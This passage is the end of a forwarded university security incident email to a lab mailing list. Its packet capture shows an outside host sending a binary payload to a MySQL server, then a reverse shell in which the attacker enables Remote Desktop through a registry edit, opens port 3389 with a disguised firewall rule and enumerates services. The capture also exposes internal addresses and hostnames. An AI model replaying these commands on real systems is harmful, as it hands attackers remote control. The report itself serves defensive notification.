target="_blank">188.132.176.26:3549</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:50.991120 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>><br>.............ff...\0\0\0\0\0L.<wbr>.M..t$H+....t(..........\0\0\0<wbr>H..I..t....u...I...H...H...H..<wbr>I...r&I........~L..L..I...M3.I<wbr>.\0.......M..t.I......\0\0\0..<wbr>......\0\0\0H..I..tx...$.tuH..<wbr>I..tiH........tbH..I..tV...$.t<wbr>SH..I..tGH........t@H..I..t4..<wbr>.$.t1H..I..t%........t.H..I..t<wbr>....$.t.H..I....<...I...H..H3.<wbr>I...rE...t\nH....I....I..<br>> r.H..H.Q.H.Q.H.Q.H.. I.. s.I..<br>><br>I...r.H..H.....I...I...r...H..<wbr>..I.....@SVWATAUH..@I....L..L.<wbr>.H..H..u*..t&.,.\0\0.\0.\0\0\0<wbr>H!t$<br>> E3.E3.3.3..6.\0\03....\0\03...<wbr>.....u\'...\0\0.\0.\0\0\0H.d$<br>> \0E3.E3.3.3....\0\03..Y.\0\03.<wbr>H.......u\'...\0\0.\0.\0\0\0H.<wbr>d$<br>><br>\0E3.E3.3.3...\n\0\03..&.\0\0.<wbr>.u.3....\0\0H..$.\0\0\0H....3\<wbr>0\0..C.@...\0\0\0H...P6\0\0...<wbr>t*...t%Hc.H..H...L.....\0...Hk<wbr>.XI...H.\r..\0\0..H.\r..\0\0H.<wbr>.L.....\0.B8.u%...t\Z...t.Hc.<wbr>H..H......Hk.XI....A8.t\'...\<wbr>0\0.\0.\0\0\0H.d$<br>><br>\0E3.E3.3.3...\n\0\03.H.t$0H..<wbr>tV....|$xtH.C..x.H.....H..H...<wbr>\nH...84\0\0...L$p...u.M;.u.3.<wbr>H.t$0..A..$I..L.d$8..\nt...A..<wbr>$\0H....3\0\0H..H..@A]A\\_^[.H<wbr>.\\$.H.t$.WH..<br>> H..H..H..u\nH........jH!<br>><br>..u..^....\\H...wCH.\r...\0..\<wbr>0\0\0H..H.D.L..3.L......\0\0H.<wbr>.H..uo9....\0tPH...Q(\0\0..t+H<wbr>...v.H...?(\0\0...\0\0.\0.\0\0<wbr>\03.H.\\$0H.t$8H..<br>><br>_....\0\0H......\0\0...y.\0\0.<wbr>......\0\0H......\0\0...`.\0\0<wbr>..H.....H.\\$.H.t$.WH..<br>><br>.=...\0\0H.....\0H..tmH..u.H9.<wbr>...\0t_..5\0\0..uVH.....\0H..t<wbr>JH..tEH.....\0\0H..H..H..t2...<wbr>\0\0H;.v.H...<9=u.L..H...E5\0\<wbr>0..t.H.....H..H.D8...3.H.\\$0H<wbr>.t$8H..<br>> <a href="mailto:_....@SH..0H..3.H.......u$...%5C0%5C0.%5C0.%5C0%5C0%5C0H.d$" target="_blank">_....@SH..0H..3.H.......u$...\<wbr>0\0.\0.\0\0\0H.d$</a><br>> \0E3.E3.3.3....\0\03..`...\0\0<wbr>..6\0\03.H=.<br>><br>> T 2017/01/18 02:45:50.991124 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> .\0\0.....u$...\0\0.\0.\0\0\0H<wbr>.d$<br>><br>\0E3.E3.3.3....\0\03..#..\0\0\<wbr>0..\r\0\0.H.......H....\0\0\0.<wbr>..\0\0H..H..0[..H.\\$.H.t$.H.|<wbr>$.ATH..0I..H..H....\0\0\0..\r\<wbr>0\0.3.H.......u&.\".\0\0..\0\0<wbr>\0..H.d$<br>> \0E3.E3.3.3..*.\0\0..\0\0\0H.\<wbr>'\0H..t.H.#\03.H.......u#...\0<wbr>\0..\0\0\0<br>> ..H.d$<br>><br>\0E3.E3.3.3....\0\0.zH.......H<wbr>..H..u.3..fH...Q.\0\0..\0\0\0L<wbr>.$.I....4\0\0H..H..u....\0\0.\<wbr>0.\0\0\0...\0\0...1L..I..H....<wbr>.\0\0..t.H.d$<br>> \0E3.E3.3.3..Q.\0\0H..t.L.#3..<wbr>.\0\0\0...\0\0..H.\\$@H.t$HH.|<wbr>$PH..0A\\..@SH..<br>><br>I.....u......\0\0..u.3....\0\0<wbr>..7\0\0..u....\0\0....=\0\0...<wbr>.\0\0H.....\0..;\0\0H..\Z.\0\0<wbr>...\0\0..y..h4\0\0....:\0\0..x<wbr>...7\0\0..x.3....\0\0..u.....\<wbr>0\0..\0\0\0.i.\0\0....u9....\0<wbr>\0....z.........\0\09..\0.\0u.<wbr>..!\0\0H..ux.6.\0\0..4\0\0.4.\<wbr>0\0.g...uV..3\0\0...\0\0..\0\<wbr>0\0.].\0\0H..H....*....\r..\0\<wbr>0H......\0\0H....t.3...3\0\0..<wbr>..\0\0H.K.......<br>> ...........u.3..O6\0\0..\0\0\0<wbr>H..<br>><br>[.H.\\$.H.t$.H.|$.ATH..0I....L<wbr>....\0\0\0..u.9...\0\0u.3...\0<wbr>\0\0...t....u0L.\r&.\0\0M..t.A<wbr>...D$<br>> ..t.L....I...a....D$ .....\0\0\0!<br>> L....I....>\0\0...D$<br>><br>...u5..u1L..3.I....>\0\0L..3.I<wbr>.......L....\0\0M..t.L..3.I..A<wbr>....t....u7L....I...........#.<wbr>...L$<br>> t.H....\0\0H..t.L....I.......D<wbr>$<br>> ....3.H.\\$@H.t$HH.|$PH..0A\\.<wbr>H.\\$.H.t$.WH..<br>> I....H.....u...=\0\0L....H..H.<wbr>\\$0H.t$8H..<br>><br>_........H.L$.H...\0\0\0H.\ry.<wbr>\0\0..c.\0\0L..d.\0\0L.\\$XE3.<wbr>H.T$`H.L$X.K.\0\0H.D$PH.|$P\0t<wbr>AH.D$8\0\0\0\0H.D$HH.D$0H.D$@<wbr>H.D$(H..$.\0\0H.D$<br>><br>L.L$PL.D$XH.T$`3....\0\0.\"H..<wbr>$.\0\0\0H....\0\0H..$.\0\0\0H.<wbr>..H..}.\0\0H....\0\0H..G.\0\0H<wbr>..$.\<br>><br>> T 2017/01/18 02:45:50.991425 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:50.991744 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:51.015642 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:51.176555 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>><br>0\0\0H..H.\0\0....\0\0..\0....<wbr>.\0\0.\0\0\0H....\0\0H.D$hH...<wbr>.\0\0H.D$p..n.\0\0....\0\0..\0<wbr>\0\0.v=\0\03...N.\0\0H.\r..\0\<wbr>0..9.\0\0.=b.\0\0\0u\n..\0\0\<wbr>0.N=\0\0....\0\0...\0.H....\n.<wbr>\0\0H...\0\0\0...L.\r9.\0\03.<wbr>I..D.@.;\nt+..I....-<br>><br>r..A....w..\r\0\0\0...D.....\0<wbr>\0\0...A.F..H.A.D....H..(.o1\0<wbr>\0H..u.H..K.\0\0..H...H..(.H..<wbr>(.O1\0\0H..u.H../.\0\0..H...H.<wbr>.(<a href="mailto:.@SH" target="_blank">.@SH</a>..<br>> ...+1\0\0H..u.H....\0\0..H....<wbr>...1\0\0L....\0\0H..t.L.P....;<wbr>...A..H..<br>><br>[....L$.H..(E3..\0.\0\03...X.\<wbr>0\0H..!.\0\0H..t#L.D$0A..\0\0\<wbr>03.H...D$0.\0\0\0..&.\0\0..\0\<wbr>0\0H..(.H..(H.\r..\0\0....\0\0<wbr>H.%..\0\0\0H..(...H.\r..\0\0.@<wbr>SH....\0\0.d$p\0H.L$t3.A..\0\0<wbr>\0.L\r\0\0L.\\$pH..$..\0\0H..$<wbr>..\0\0L.\\$HH.D$P....\0\0H..$.<wbr>.\0\0H.T$@H..E3....\0\0H..t;H.<wbr>d$8\0H.T$@H.L$`H.L$0H.L$XL..H.<wbr>L$(H..$..\0\0L..H.L$<br>> 3..Q.\0\0.<br>><br>H..$..\0\0H..$..\0\0H..$..\0\0<wbr>H..$..\0\0H..$..\0\0.D$p..\0..<wbr>D$t.\0\0\0H..$.\0\0\0....\0\03<wbr>.......\0\0H.L$H....\0\0..u...<wbr>u..H...:\0\0..N.\0\0...\0.H...<wbr>...\0\0H....\0\0[....H.\\$.H.<wbr>l$.H.t$.WH..0H..H.\r..\0\0A..<wbr>I..H...@.\0\0H..t\ZL.T!<br>> $`D..L..H..H..L.T$ ...%..\0\0\0.o:\0\0L.\\$`D..L.<wbr>.H..H..L.\\$<br>> .h...H.\\$@H.l$HH.t$PH..0_....<wbr>H.\\$.H.l$.H.t$.WH..<br>> 3.H.....H.......H..H..u(9...\0<wbr>\0v ....<br>> .\0\0D....\0\0D;...\0\0A...G.;<wbr>.u.H.l$8H.t$@H..H.\\$0H..<br>> _.H..H.X.H.h.H.p.H.x ATH..<br>><br>3.H..H..A...E3.H..H....9\0\0H.<wbr>.H..u*9...\0\0v\"......\0\0D..<wbr>..\0\0D;.g.\0\0A..A.G.A;.u.H.l<wbr>$8H.t$@H.|$HH..H.\\$0H..<br>> A\\..H..H.X.H.h.H.p.H.x ATH..<br>><br>3.H..H..A...H..H.......H..H..u<wbr>/H..t*9...\0\0v\"......\0\0D..<wbr>..\0\0D;...\0\0A..A.G.A;.u.H.l<wbr>$<br>><br>> T 2017/01/18 02:45:54.767136 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:55.049876 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> Microsoft Windows [Version 6.1.7601]<br>><br>> T 2017/01/18 02:45:55.448211 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:55.448772 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> Copyright (c) 2009 Microsoft Corporation. All rights reserved..<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:45:55.776319 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:19.130812 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> ipconfig<br>><br>><br>> T 2017/01/18 02:46:19.131472 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> ipconfig<br>><br>><br>> T 2017/01/18 02:46:19.304083 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [A]<br>> .<br>> Windows IP Configuration.<br>> .<br>> .<br>> Ethernet adapter Local Area Connection:.<br>> .<br>> Connection-specific DNS Suffix . : <a href="http://cs.ucsb.edu" target="_blank">cs.ucsb.edu</a>.<br>> IPv4 Address. . . . . . . . . . . : 128.111.28.118.<br>> Subnet Mask . . . . . . . . . . . : 255.255.255.192.<br>> Default Gateway . . . . . . . . . : 128.111.28.65.<br>> .<br>> Ethernet adapter Local Area Connection 2:.<br>> .<br>> Connection-specific DNS Suffix . : .<br>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.<br>> Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.<br>> IPv4 Address. . . . . . . . . . . : 10.37.130.2.<br>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.<br>> Default Gateway . . . . . . . . . : .<br>> .<br>> Ethernet adapter Local Area Connection 2:.<br>> .<br>> Connection-specific DNS Suffix . : .<br>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.<br>> Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.<br>> IPv4 Address. . . . . . . . . . . : 10.37.131.2.<br>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.<br>> Default Gateway . . . . . . . . . : .<br>> .<br>> Tunnel adapter <a href="http://isatap.cs.ucsb.edu" target="_blank">isatap.cs.ucsb.edu</a>:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-specific DNS Suffix . : <a href="http://cs.ucsb.edu" target="_blank">cs.ucsb.edu</a>.<br>> .<br>> Tunnel adapter isatap.{49BB9C41-C060-433B-BF9<wbr>1-9F104E841F11}:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-specific DNS Suffix . : .<br>> .<br>> Tunnel adapter Local Area Connection* 11:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-spec<br>><br>> T 2017/01/18 02:46:19.304089 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> ific DNS Suffix . : .<br>><br>><br>> T 2017/01/18 02:46:19.500202 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:19.500764 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> Tunnel adapter isatap.{EB59D303-0C84-4EF4-842<wbr>B-01A57D775715}:.<br>> .<br>> Media State . . . . . . . . . . . : Media disconnected.<br>> Connection-specific DNS Suffix . : .<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:46:19.696722 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:44.733187 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> reg.exe ADD<br>> "HKEY_LOCAL_Machine\System\Cur<wbr>rentControlSet\Control\Termina<wbr>l<br>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f<br>><br>><br>> T 2017/01/18 02:46:44.733944 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> reg.exe ADD<br>> "HKEY_LOCAL_Machine\System\Cur<wbr>rentControlSet\Control\Termina<wbr>l<br>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f<br>><br>><br>> T 2017/01/18 02:46:45.104427 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:45.104905 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> The operation completed successfully...<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:46:45.432785 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:56.087756 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> netsh advfirewall firewall add rule name = "Windows Service Host"<br>> dir=in action=allow protocol=TCP localport=3389<br>><br>><br>> T 2017/01/18 02:46:56.088487 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> netsh advfirewall firewall add rule name = "Windows Service Host"<br>> dir=in action=allow protocol=TCP localport=3389<br>><br>><br>> T 2017/01/18 02:46:56.596211 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:59.117911 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> Ok..<br>> .<br>><br>> T 2017/01/18 02:46:59.432046 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:46:59.432624 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> T 2017/01/18 02:46:59.761298 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:47:16.188439 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [AP]<br>> net start<br>><br>><br>> T 2017/01/18 02:47:16.189037 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> net start<br>><br>><br>> T 2017/01/18 02:47:16.385997 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:47:16.427758 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> These Windows services are started:.<br>><br>><br>> T 2017/01/18 02:47:16.428404 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [A]<br>> .<br>> Adobe Acrobat Update Service.<br>> AMD External Events Utility.<br>> Apple Mobile Device.<br>> Application Experience.<br>> Application Information.<br>> Background Intelligent Transfer Service.<br>> Base Filtering Engine.<br>> Bonjour Service.<br>> Certificate Propagation.<br>> COM+ Event System.<br>> Computer Browser.<br>> Credential Manager.<br>> Cryptographic Services.<br>> DCOM Server Process Launcher.<br>> Desktop Window Manager Session Manager.<br>> DHCP Client.<br>> Diagnostic Policy Service.<br>> Diagnostic Service Host.<br>> Diagnostics Tracking Service.<br>> Distributed Link Tracking Client.<br>> DNS Client.<br>> Function Discovery Provider Host.<br>> Function Discovery Resource Publication.<br>> Group Policy Client.<br>> Human Interface Device Access.<br>> IKE and AuthIP IPsec Keying Modules.<br>> IP Helper.<br>> iPod Service.<br>> IPsec Policy Agent.<br>> LMIGuardianSvc.<br>> LogMeIn.<br>> LogMeIn Maintenance Service.<br>> Microsoft Antimalware Service.<br>> Microsoft Network Inspection.<br>> Microsoft Office Click-to-Run Service.<br>> MT7 Registry Service.<br>> MT7 Serial Search Service.<br>> MySQL55.<br>> Network Connections.<br>> Network List Service.<br>> Network Location Awareness.<br>> Network Store Interface Service.<br>> Office Software Protection Platform.<br>> Offline Files.<br>> Parallels Networking Service.<br>> Parallels Virtualization Service.<br>> Plug and Play.<br>> Pml Driver HPZ12.<br>> PnP-X IP Bus Enumerator.<br>> Portable Device Enumerator Service.<br>> Power.<br>> Print Spooler.<br>> Program Compati<br>><br>> T 2017/01/18 02:47:16.428408 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> bility Assistant Service<br>><br>> T 2017/01/18 02:47:16.625665 <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> -><br>> <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:47:16.626533 <a href="http://128.111.28.118:20138" target="_blank">128.111.28.118:20138</a> -><br>> <a href="http://188.132.176.26:4000" target="_blank">188.132.176.26:4000</a> [AP]<br>> .<br>> Quality Windows Audio Video Experience.<br>> Remote Access Connection Manager.<br>> Remote Desktop Configuration.<br>> Remote Desktop Services.<br>> Remote Desktop Services UserMode Port Redirector.<br>> Remote Procedure Call (RPC).<br>> Routing and Remote Access.<br>> RPC Endpoint Mapper.<br>> Secondary Logon.<br>> Secure Socket Tunneling Protocol Service.<br>> Security Accounts Manager.<br>> Security Center.<br>> Server.<br>> Shell Hardware Detection.<br>> Skype C2C Service.<br>> SQL Server (SQLEXPRESS).<br>> SQL Server VSS Writer.<br>> SSDP Discovery.<br>> Superfetch.<br>> System Event Notification Service.<br>> Tablet PC Input Service.<br>> TabletServicePen.<br>> Task Scheduler.<br>> TCP/IP NetBIOS Helper.<br>> TeamViewer 11.<br>> Telephony.<br>> Themes.<br>> UPnP Device Host.<br>> User Profile Service.<br>> Wacom Consumer Touch Service.<br>> Windows App Certification Kit Fast User Switching Utility Service.<br>> Windows Audio.<br>> Windows Audio Endpoint Builder.<br>> Windows Driver Foundation - User-mode Driver Framework.<br>> Windows Event Log.<br>> Windows Firewall.<br>> Windows Font Cache Service.<br>> Windows Image Acquisition (WIA).<br>> Windows Management Instrumentation.<br>> Windows Media Player Network Sharing Service.<br>> Windows Presentation Foundation Font Cache 3.0.0.0.<br>> Windows Search.<br>> Windows Update.<br>> WinHTTP Web Proxy Auto-Discovery Service.<br>> Workstation.<br>> .<br>> The command completed successfully..<br>> .<br>> .<br>> C:\ProgramData\MySQL\MySQL Server 5.5\data><br>><br>> ----------sample----------<br>> --<br>> E. Todd Atkins<br>> Enterprise Technology Services<br>> University of California, Santa Barbara <a href="http://www.security.ucsb.edu/" target="_blank">http://www.security.ucsb.edu/</a><br>><br>> ******************************<wbr>******************************<wbr>**********<br>> The NOC's list of network contacts is used to determine who should<br>> receive email such as this. Please direct any requests for changes to<br>> this list of network contacts to <a href="mailto:noc@ucsb.edu" target="_blank">noc@ucsb.edu</a>.<br>> ******************************<wbr>******************************<wbr>**********<br>><br><br><br>--<br><br>Scott Kasai<br>User Support Specialist<br>Engineering Computing Infrastructure<br>University of California, Santa Barbara<br><br><br><br><br><br>______________________________<wbr>_________________<br>Ilab-users mailing list<br><a href="mailto:Ilab-users@lists.cs.ucsb.edu" target="_blank">Ilab-users@lists.cs.ucsb.edu</a><br><a href="https://lists.cs.ucsb.edu/mailman/listinfo/ilab-users" target="_blank">https://lists.cs.ucsb.edu/mail<wbr>man/listinfo/ilab-users</a><u></u><u></u></p></div></blockquote></div><p class="MsoNormal"><u></u> <u></u></p></div></div></div></blockquote></div></div>
</blockquote></div></div>